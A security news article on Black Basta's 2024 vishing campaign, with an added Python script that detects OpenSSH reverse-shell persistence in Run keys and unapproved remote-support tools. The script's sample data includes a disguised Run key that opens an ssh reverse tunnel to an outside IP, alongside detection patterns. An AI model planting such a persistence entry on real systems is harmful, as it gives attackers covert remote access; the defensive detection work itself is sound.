Black Basta Ransomware Group Adopts New Vishing Strategy, Targeting Over 500 Organizations

May 13, 2024

Black Basta, a notorious ransomware group, has reportedly adopted a new vishing (voice phishing) technique to trick its victims. The approach involves flooding victims with spam emails and then offering assistance through fake customer service representatives, who talk them into downloading malware. The report coincides with a joint cybersecurity advisory issued by the FBI, Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC), underlining Black Basta's extensive attacks on critical infrastructure.

The ransomware-as-a-service (RaaS) operation, according to the government, typically employs spearphishing and software vulnerabilities to gain initial access to sensitive and high-value organizations. However, researchers at Rapid7 have observed a shift in tactics: the group is now sending spam emails followed by fraudulent assistance calls, a departure from its usual targeted breaches. The victims of these attacks span various industries, including manufacturing, construction, food and beverage, and transportation. Robert Knapp, senior manager of incident response services at Rapid7, noted that these attacks seem to be more opportunistic than targeted.

Since its discovery in April 2022, Black Basta has compromised a wide range of organizations, including 12 of the 16 US-defined critical infrastructure sectors. Affiliates have reportedly attacked over 500 organizations globally, predominantly in the US, Europe, and Australia. The group's primary method of gaining initial access into systems has been spearphishing. However, since February, affiliates have also been exploiting the critical-rated ConnectWise ScreenConnect bug CVE-2024-1709.

The latest campaign, observed since April, begins with a wave of emails, enough to overwhelm basic spam protections. The attackers then start making calls, posing as members of the targets' IT staff, and trick victims into downloading a remote support tool, either the AnyDesk remote monitoring and management (RMM) platform, or Windows' native Quick Assist utility. Once access is granted, the attacker runs a series of batch scripts disguised as software updates. These scripts establish a connection with the attacker's command-and-control (C2) infrastructure, download a ZIP archive housing OpenSSH, and create run key entries in the Windows registry to establish a reverse shell.

While some credential harvesting has been observed, there have been no instances of mass data exfiltration or extortion yet. Rapid7 advises organizations to review their RMM solutions and use allowlisting tools such as AppLocker or Microsoft Defender Application Control to block any RMM tools they do not use. They also recommend blocking domains associated with disallowed RMMs and monitoring for the installation and execution of AnyDesk. If blocking is not possible, diligent monitoring and response procedures are recommended.
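As an added illustration (not code from the advisory or from Rapid7), the monitoring recommendations above expressed as a small Python triage script: it scans Run key entries for an OpenSSH binary launched from a non-standard path or with tunnel-only flags, the persistence pattern described in the campaign, and flags process-creation events for RMM binaries that policy has not approved. The registry values, hostnames and IP address are constructed sample data, not real indicators.

```python
import re
from typing import Dict, List

# OpenSSH binary referenced anywhere in a Run key command line.
SSH_BINARY = re.compile(r'(?:^|[\\/\s"])sshd?\.exe', re.IGNORECASE)
# -R (reverse forward) and -N (no remote command) are what a tunnel-only
# invocation needs; an interactive admin session would not persist them.
TUNNEL_FLAGS = re.compile(r"(?:^|\s)-(?:[a-zA-Z]*R|N)\b")
# Where a legitimately installed Windows OpenSSH client lives.
TRUSTED_SSH_DIRS = (r"c:\windows\system32\openssh", r"c:\program files\openssh")
# Remote-support binaries named in the article; flagged unless explicitly approved.
RMM_BINARIES = {"anydesk.exe", "quickassist.exe"}

# Constructed sample Run key values (not real indicators), shaped like an
# EDR or `reg query` export of HKCU\...\CurrentVersion\Run.
SAMPLE_RUN_KEYS: Dict[str, str] = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WindowsUpdate": r"C:\Users\alice\AppData\Local\Temp\update\ssh.exe -N -R 2222:127.0.0.1:22 svc@203.0.113.10",
}
# Constructed process-creation events (image path only; a real feed carries more fields).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "2024-05-01T10:02:11Z", "host": "WS-017", "image": r"C:\Users\alice\Downloads\AnyDesk.exe"},
    {"time": "2024-05-01T10:05:40Z", "host": "WS-017", "image": r"C:\Windows\System32\cmd.exe"},
]

def triage_run_keys(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Return {value_name: [reasons]} for Run keys matching the OpenSSH persistence pattern."""
    findings: Dict[str, List[str]] = {}
    for name, command in entries.items():
        if not SSH_BINARY.search(command):
            continue
        reasons = []
        if not any(d in command.lower() for d in TRUSTED_SSH_DIRS):
            reasons.append("ssh.exe launched from a non-standard path")
        if TUNNEL_FLAGS.search(command):
            reasons.append("ssh invoked with -R/-N (tunnel, no interactive session)")
        if reasons:
            findings[name] = reasons
    return findings

def flag_rmm_processes(events: List[Dict[str, str]], approved: set) -> List[Dict[str, str]]:
    """Return process events whose image is an RMM binary that policy has not approved."""
    hits = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image in RMM_BINARIES and image not in approved:
            hits.append(ev)
    return hits

if __name__ == "__main__":
    print(triage_run_keys(SAMPLE_RUN_KEYS))
    print(flag_rmm_processes(SAMPLE_EVENTS, approved=set()))
```

In production the inputs would come from an EDR or a scheduled registry export rather than the embedded samples, and the approved set would hold whichever RMM the organization has sanctioned.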
